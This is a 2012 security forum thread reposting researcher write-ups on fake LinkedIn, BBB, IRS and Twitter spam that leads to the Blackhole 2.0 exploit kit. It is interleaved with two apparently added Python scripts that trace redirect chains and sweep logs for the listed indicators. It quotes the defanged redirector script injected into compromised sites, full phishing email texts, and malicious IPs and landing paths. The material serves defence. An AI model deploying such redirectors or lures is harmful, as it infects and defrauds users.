Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #1
    AplusWebMaster (Adviser Team)
    Join Date: Oct 2005
    Location: USA
    Posts: 6,881

    LinkedIn SPAM - Blackhole Exploit Kit v2.0...

    FYI...

    LinkedIn SPAM / 69.194.201.21
    - http://blog.dynamoo.com/2012/09/link...919420121.html
    22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
    Date: Sat, 22 Sep 2012 15:16:47 -0500
    From: "Reminder" [CC8504C0E@updownstudio.com]
    Subject: LinkedIn: New messages awaiting your response
    LinkedIn
    REMINDERS
    Invitation reminders:
    From Emilio Byrd (Insurance Manager at Wolseley)
    PENDING MESSAGES
    There are a total of 88 message(-s) awaiting your response. Go to InBox now.
    This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
    Adjust your message settings.
    LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
    2012, LinkedIn Corporation.

    The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
    ___

    Fake 'KLM e-Ticket' attempts to install backdoor
    - http://community.websense.com/blogs/...-backdoor.aspx
    21 Sep 2012 - "... malicious zipped attachment..."
    ___

    New Malware Sites using Blackhole Exploit Kit v2.0
    - https://blog.opendns.com/2012/09/18/...loit-kit-v2-0/
    Sep 18, 2012

    Last edited by AplusWebMaster; 2012-09-24 at 17:42.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #2
    AplusWebMaster

    BBB malicious SPAM flood

    FYI...

    BBB malicious SPAM flood
    - http://community.websense.com/blogs/...pam-flood.aspx
    24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense... has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
    > http://community.websense.com/cfs-fi...D00_Image1.png
    ... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
    > http://community.websense.com/cfs-fi...2D00_550x0.png
    ... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
    1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
    2) <html>
    <h1>WAIT PLEASE</h1>
    <h3>Loading...</h3>
    <script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
    <script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
    </html>
    3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
    As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
    ___

    BBB Spam / 108.178.59.11
    - http://blog.dynamoo.com/2012/09/bbb-...081785911.html
    24 Sep 2012 - "... most likely a Blackhole 2 kit. This IP address has been used in other attacks and should be blocked if you can."

    - http://centralops.net/co/DomainDossier.aspx
    108.178.59.11
    network: State: Italy
    OriginAS: AS32475

    - http://google.com/safebrowsing/diagnostic?site=AS:32475
    "... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."

    Last edited by AplusWebMaster; 2012-09-25 at 05:50.
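The redirection path quoted from Websense in the post above (a compromised site's index.html that pulls in two remote js.js files, each of which sets document.location to the Blackhole 2 landing page) can be walked without touching any of the hosts. The following is an added example written for this thread, not code from Websense, Dynamoo or the poster: it refangs the "hxxp ://host .tld" notation used in the post, pulls script sources and document.location targets out of page bodies with regular expressions, and follows them through an in-memory dictionary of constructed page bodies that mirror the three stages shown. The URLs are the ones in the post; the page bodies, the refang/defang helpers and the walk_chain/landing_pages functions are assumptions for the example.

```python
"""
Static walk of a Blackhole-style redirection chain.

Added example (not from the Websense or Dynamoo write-ups quoted in the
thread): reproduces the three-stage path shown in post #2 -- compromised
index.html -> remote js.js -> document.location to the exploit-kit landing
page -- without contacting any host. Page bodies come from an in-memory
dict, so the script runs offline; all bodies below are constructed from
the defanged samples in the post.
"""
import re
from typing import Callable, Dict, List

# Defanged form used in the post: "hxxp ://host .tld/path"
_DEFANG_SCHEME = re.compile(r"^hxxp(s?)\s*://", re.IGNORECASE)
_SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)
_LOCATION = re.compile(
    r"(?:document|window)\.location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)


def refang(url: str) -> str:
    """Turn 'hxxp ://pst.org .br/x' into 'http://pst.org.br/x'."""
    url = _DEFANG_SCHEME.sub(lambda m: "http" + m.group(1) + "://", url.strip())
    # collapse the space the post inserts before a '.' or '/' ("org .br", ".11 /links")
    return re.sub(r"\s+(?=[./])", "", url)


def defang(url: str) -> str:
    """Make a URL safe to paste into a report: http -> hxxp, '.' -> '[.]' in the host."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def script_sources(html: str) -> List[str]:
    """Remote <script src=...> URLs referenced by a page body."""
    return [refang(u) for u in _SCRIPT_SRC.findall(html)]


def location_targets(js: str) -> List[str]:
    """URLs assigned to document.location / window.location(.href) in a script body."""
    return [refang(u) for u in _LOCATION.findall(js)]


def walk_chain(start: str, fetch: Callable[[str], str], max_depth: int = 10) -> List[str]:
    """Breadth-first walk of the redirect chain from `start`.

    `fetch(url)` returns a page body or raises KeyError when the body is not
    available (a leaf: offline here, a dead host in practice). Returns the
    ordered list of distinct URLs visited, ending with the landing page(s).
    """
    chain: List[str] = []
    queue, seen = [refang(start)], set()
    while queue and len(chain) < max_depth:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        chain.append(url)
        try:
            body = fetch(url)
        except KeyError:
            continue  # no body to inspect: treat as a leaf
        queue.extend(script_sources(body) + location_targets(body))
    return chain


# Constructed sample bodies (assumed for the example) mirroring the chain in post #2.
SAMPLE_PAGES: Dict[str, str] = {
    "http://vargasvilcolombia.com/PykKDZe/index.html": (
        "<html>\n<h1>WAIT PLEASE</h1>\n<h3>Loading...</h3>\n"
        '<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>\n'
        '<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>\n'
        "</html>"
    ),
    "http://pst.org.br/Wi4aFSLZ/js.js":
        "document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';",
    "http://www.adahali.com/NQ9Ba2ap/js.js":
        "document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';",
}


def landing_pages(start: str, pages: Dict[str, str] = SAMPLE_PAGES) -> List[str]:
    """Chain members with no body of their own, i.e. the exploit-kit landing page(s)."""
    return [u for u in walk_chain(start, pages.__getitem__) if u not in pages]


if __name__ == "__main__":
    for hop in walk_chain("hxxp ://vargasvilcolombia .com/PykKDZe/index.html", SAMPLE_PAGES.__getitem__):
        print(defang(hop))
```

Against the constructed bodies the walk yields four hops: the compromised index.html, the two js.js redirectors, and the single /links/deep_recover-result.php landing page on 108.178.59.11. With a real fetcher, the `seen` set and `max_depth` keep a looping or very deep chain from running away, and the landing page is whatever URL the kit serves without further redirection.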

  3. #3
    AplusWebMaster

    Twitter DMs from "friends" lead to backdoor Trojan...

    FYI...

    Twitter DMs from "friends" lead to backdoor Trojan
    - http://nakedsecurity.sophos.com/2012...video-malware/
    Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
    > https://sophosnews.files.wordpress.c...cked.jpg?w=640
    ... here's another. Note that there are many different combinations of wording that can be used.
    > https://sophosnews.files.wordpress.c...ed-2.jpg?w=640
    Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
    > https://sophosnews.files.wordpress.c...ware.jpg?w=640
    ... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."


  4. #4
    AplusWebMaster

    Multiple malware IP's to be blocked ...

    FYI...

    Evil network: 108.178.59.0/26
    - http://blog.dynamoo.com/2012/09/evil...817859026.html
    25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
    So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
    Singlehop have reallocated the IP range to a customer:
    network: IP-Network: 108.178.59.0/26
    network: State: Italy
    network: Country-Code: IT ...
    It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."

    - http://centralops.net/co/DomainDossier.aspx
    network: IP-Network: 108.178.59.0/26
    network: State: Italy
    network: Country-Code: IT
    ___

    BBB SPAM / one.1000houses .biz
    - http://blog.dynamoo.com/2012/09/bbb-...housesbiz.html
    25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
    Date: Tue, 25 Sep 2012 11:42:18 +0200
    From: "Better.Business Bureau" [8050910@zread.com]
    Subject: Activity Report
    Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
    You are asked to provide response to this complaint within 7 days.
    Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
    Complaint ID#125368
    Council of Better Business Bureaus
    3033 Wilson Blvd, Suite 600
    Arlington, VA 22201
    Phone: 1 (703) 276.0100
    Fax: 1 (703) 525.8277

    The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.
    Blocking 199.195.116.185 would probably be prudent..."


  5. #5
    AplusWebMaster

    FTC halts computer spying

    FYI...

    FTC halts computer spying
    * http://www.ftc.gov/opa/2012/09/designware.shtm
    09/25/2012

    Rent-to-own laptops were spying on users
    - http://h-online.com/-1717567
    26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leibowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
    ** http://www.wired.com/threatlevel/201...yware-scandal/


  6. #6
    AplusWebMaster

    Spear Phishing Emails increase 56% ...

    FYI...

    Spear Phishing Emails increase 56% ...
    - http://blog.fireeye.com/research/201...ng-emails.html
    2012.09.25 - "Despite the many security defenses aimed at protecting email communications, email continues to be a critical vulnerability for enterprises. Between Q1 2012 and Q2 2012 alone, FireEye reported a 56% increase in the amount of malicious emails - and this wasn’t simply an increase in the total number of emails distributed; it was an increase in the number of emails that were able to -bypass- signature and reputation-based security defenses, like next-generation firewalls, intrusion prevention systems (IPS), anti-virus (AV), and secure gateways... In a new report from FireEye*, FireEye researchers analyze the nature of malicious files cybercriminals distribute in order to bypass traditional security defenses and identify several trends - including the most common words in file names and file extensions used in spear phishing attacks. Among these trends, in particular, FireEye researchers found:
    • File names relating to shipping grew from 19.20% to 26.35%.
    • Number of files referencing words associated with urgency grew from 1.72% to 10.68%.
    • Shipping-related words topped the lists of most frequently appearing words in spear phishing emails for both 2H 2011 and 1H 2012.
    In the security community, we’re more than familiar with the consequences stemming from these kinds of advanced cyber attacks - GhostNet, Night Dragon, Operation Aurora, and the RSA breach all originated, at least in part, via targeted spear phishing emails. These highly publicized incidents only further indicate what cybercriminals already well know and use to their advantage: email is a mode of attack that works..."

    * http://www.fireeye.com/resources/pdf...hing-words.pdf


  7. #7
    AplusWebMaster

    IRS SPAM - 3 different versions ...

    FYI...

    IRS SPAM - 3 different versions ...
    - http://blog.dynamoo.com/2012/09/irs-...ancom-and.html
    26 Sep 2012 - "Three different versions of fake IRS spam today, two leading to malware on 1.howtobecomeabostonian .com and the other with a malicious payload on mortal-records .net.
    Date: Wed, 26 Sep 2012 20:44:47 +0530
    From: "Internal Revenue Service (IRS)" [58D1F47@guyzzer.com]
    To: [redacted]
    Subject: Internal Revenue Service: For the attention of enterpreneurs
    Internal Revenue Service (IRS)
    Hello,
    Due to the system error the EIN of your company has been accidently erased from the online database, please validate your EIN to reaffirm your current status of taxpayer. Certain indulgences will be applied to the next audit report for your company. IRS is sorry to cause inconvenience.
    For detail information, please refer to:
    https ://www.irs .gov/Login.aspx?u=E8710D9E9
    Email address: [redacted]
    Sincerely yours,
    Barry Griffin
    IRS Customer Service representative
    Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
    You will need to use your email address to log in.
    This service is provided to you at no charge by the Internal Revenue Service (IRS).
    This email was sent to [redacted] by: Internal Revenue Service (IRS) | Internal Revenue Service | 1111 Constitution Ave. N.W. | Washington DC 20535
    ==========
    Date: Wed, 26 Sep 2012 11:09:45 -0400
    From: "Internal Revenue Service (IRS)" [90A75BC@etherplay.com]
    To: [redacted]
    Subject: Internal Revenue Service: For the attention of enterpreneurs
    Internal Revenue Service (IRS)
    Dear business owners,
    Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry for the inconvenience caused.
    For the details please refer to:
    https ://www.irs .gov/ClientArea.aspx?u=1CBD0FC829256C
    Email address: [redacted]
    Sincerely yours,
    Damon Abbott
    Internal Revenue Service Representative
    Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
    You will need to use your email address to log in.
    This service is provided to you at no charge by the Internal Revenue Service (IRS).
    This email was sent to [redacted] by: Internal Revenue Service (IRS) | Internal Revenue Service | 1111 Constitution Ave. N.W. | Washington DC 20535
    ==========
    Date: Wed, 26 Sep 2012 19:53:28 +0400
    From: Internal Revenue Service [weirdpr6@polysto.com]
    To: [[redacted]]
    Subject: IRS report of not approved tax bank transfer
    Your Federal Tax pending transaction (ID: 52007291963155), recently ordered for processing from your checking account was rejected by your Bank.
    Rejected Tax transaction
    Tax Transaction ID: 52007291963155
    Reason ID See details in the report below
    State Tax Transaction Report tax_report_52007291963155.doc (Microsoft Word Document)
    Internal Revenue Service 9611 Tellus. Av. Augusta 38209 MV


    Payload one is at [donotclick]1.howtobecomeabostonian .com/links/marked-alter.php hosted on 74.207.232.13 (Linode, US) which looks like a -hacked- GoDaddy domain. Payload two is at [donotclick]mortal-records .net/detects/processing-successfully.php hosted on 203.91.113.6 (G-Mobile, Mongolia) which is an IP address that has been used a LOT for this type of attack. Blocking those IPs would be ideal..."

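Posts #1, #2, #4 and #7 each end with the same advice: block the hosting IPs (69.194.201.21, the 108.178.59.0/26 range, 199.195.116.185, 74.207.232.13, 203.91.113.6) and note the landing-page paths (/links/deep_recover-result.php, /links/marked-alter.php, /detects/processing-successfully.php). Blocking is the first step; the second is to sweep existing proxy logs for clients that already reached those hosts. The following is an added example for this thread, not code from Dynamoo, Websense or the poster: it loads those indicators, tests destination addresses for CIDR membership with the standard `ipaddress` module, and flags paths that match either the exact names or a looser shape. The log format (squid-style "time client method url dest") and every log line are constructed for the example, and the path-shape regex is an assumption generalised from the three paths above, so a path-only hit is lower confidence than an IP hit.

```python
"""
IOC sweep over proxy access logs for the Blackhole 2.0 campaigns in this thread.

Added example, not from the Dynamoo/Websense posts quoted above. Indicators
are the IPs, the 108.178.59.0/26 range and the landing paths named in posts
#1, #2, #4 and #7. Log format and log lines are constructed for the example.
"""
import ipaddress
import re
from typing import List, NamedTuple, Optional
from urllib.parse import urlsplit

# Indicators taken from the posts (refanged).
BAD_NETWORKS = [ipaddress.ip_network(n) for n in (
    "69.194.201.21/32",    # LinkedIn spam, Solar VPS (post #1)
    "108.178.59.0/26",     # Singlehop range, .11/.20/.26 seen serving Blackhole (posts #2, #4)
    "199.195.116.185/32",  # one.1000houses.biz, A2 Hosting (post #4)
    "74.207.232.13/32",    # 1.howtobecomeabostonian.com, Linode (post #7)
    "203.91.113.6/32",     # mortal-records.net, G-Mobile (post #7)
)]
KNOWN_PATHS = {
    "/links/deep_recover-result.php",
    "/links/marked-alter.php",
    "/detects/processing-successfully.php",
}
# Assumption for the example: the landing paths above all look like
# /<links|detects>/<word>[-_]<word>.php, so match that shape as a weaker signal.
PATH_SHAPE = re.compile(r"^/(?:links|detects)/[a-z]+(?:[-_][a-z]+)+\.php$")


class Hit(NamedTuple):
    line_no: int
    client: str
    url: str
    reason: str


def ip_is_bad(ip: str) -> bool:
    """True if `ip` falls inside any listed network (handles the /26 range, not just exact IPs)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # hostname or garbage, not an address
    return any(addr in net for net in BAD_NETWORKS)


def classify(url: str, dest_ip: str) -> Optional[str]:
    """Strongest matching reason for one request, or None if it is clean."""
    parts = urlsplit(url)
    if ip_is_bad(dest_ip) or ip_is_bad(parts.hostname or ""):
        return "blocked-ip"
    if parts.path in KNOWN_PATHS:
        return "known-landing-path"
    if PATH_SHAPE.match(parts.path):
        return "landing-path-shape"  # heuristic, lower confidence
    return None


def sweep(lines: List[str]) -> List[Hit]:
    """Scan 'time client method url dest' lines; malformed lines are skipped, not fatal."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue
        _ts, client, _method, url, dest = fields[:5]
        reason = classify(url, dest)
        if reason:
            hits.append(Hit(n, client, url, reason))
    return hits


# Constructed sample log (not real traffic); clean destinations use RFC 5737 test addresses.
SAMPLE_LOG = [
    "1348512345.123 10.0.0.15 GET http://www.linkedin.com/inbox 198.51.100.1",
    "1348512347.456 10.0.0.15 GET http://69.194.201.21/links/deep_recover-result.php 69.194.201.21",
    "1348512400.001 10.0.0.22 GET http://one.1000houses.biz/links/deep_recover-result.php 199.195.116.185",
    "1348512456.111 10.0.0.31 GET http://108.178.59.26/PykKDZe/index.html 108.178.59.26",
    "1348512500.000 10.0.0.40 GET http://example.org/detects/total-fail.php 198.51.100.5",
    "1348512501.000 10.0.0.40 GET http://example.org/links/index.php 198.51.100.5",
    "garbage line",
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.client} -> {hit.url} [{hit.reason}]")
```

On the constructed log the sweep flags lines 2, 3 and 4 on IP (line 4 only because 108.178.59.26 sits inside the /26, which is the point of blocking the range rather than the three addresses Dynamoo happened to see) and line 5 on path shape alone; /links/index.php is left alone because a single word does not fit the shape. Clients that appear in `blocked-ip` hits reached the kit's landing page and should be treated as suspected compromises, not just blocked going forward.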
